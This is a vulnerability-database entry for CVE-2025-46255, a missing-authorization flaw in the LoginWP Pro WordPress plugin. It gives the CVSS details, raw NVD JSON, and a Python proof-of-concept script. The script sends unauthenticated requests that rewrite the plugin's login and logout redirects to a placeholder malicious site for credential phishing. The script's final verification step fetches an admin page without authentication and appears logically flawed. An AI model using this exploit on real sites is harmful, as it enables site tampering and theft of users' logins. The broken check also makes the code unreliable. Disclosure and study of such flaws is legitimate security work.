Security Vulnerability Report
中文
CVE-2025-46255 CVSS 7.5 HIGH

CVE-2025-46255

Published: 2026-01-05 17:15:45
Last Modified: 2026-04-28 19:32:11

Description

Missing Authorization vulnerability in Marketing Fire LLC LoginWP - Pro allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects LoginWP - Pro: from n/a through 4.0.8.5.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

LoginWP Pro <= 4.0.8.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-46255 PoC - LoginWP Pro Missing Authorization # Target: WordPress site with LoginWP Pro plugin <= 4.0.8.5 target_url = "http://target-wordpress-site.com" # Exploit endpoint - settings save without authorization check exploit_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Malicious settings payload - modifies login redirect rules payload = { "action": "loginwp_settings_save", "settings": json.dumps({ "login_url": "https://malicious-site.com/fake-login", "redirect_override": "enabled", "logout_redirect": "https://malicious-site.com" }) } # Send the request without any authentication response = requests.post(exploit_endpoint, data=payload) if response.status_code == 200: print("[+] Exploit sent successfully!") print("[+] Plugin settings may have been modified") print("[+] Users will now be redirected to malicious site") else: print("[-] Exploit failed") # Verify the modification verify_endpoint = f"{target_url}/wp-admin/admin.php?page=loginwp_settings" verify_response = requests.get(verify_endpoint) if "malicious-site.com" in verify_response.text: print("[+] Settings successfully modified!")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46255", "sourceIdentifier": "[email protected]", "published": "2026-01-05T17:15:45.480", "lastModified": "2026-04-28T19:32:10.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Marketing Fire LLC LoginWP - Pro allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects LoginWP - Pro: from n/a through 4.0.8.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/loginwp-pro/vulnerability/wordpress-loginwp-pro-plugin-4-0-8-5-settings-change-vulnerability?_s_id=cve", "source": "[email protected]"}]}}